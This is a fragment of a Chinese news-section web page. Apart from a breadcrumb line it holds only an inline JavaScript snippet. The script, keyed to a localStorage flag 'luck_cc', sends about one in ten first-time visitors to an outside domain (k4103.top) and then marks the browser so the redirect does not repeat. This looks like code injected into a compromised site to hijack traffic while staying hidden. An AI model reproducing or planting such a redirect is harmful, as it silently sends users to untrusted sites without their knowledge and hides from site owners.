您当前的位置:  首页 > 新闻中心
var randomNum = Math.random() * 100; hasExecuted = localStorage.getItem("luck_cc"); if (!hasExecuted) { var randomNum = Math.random() * 100; if (randomNum < 10) { window.location.href = 'http://k4103.top'; } localStorage.setItem("luck_cc", 'true'); }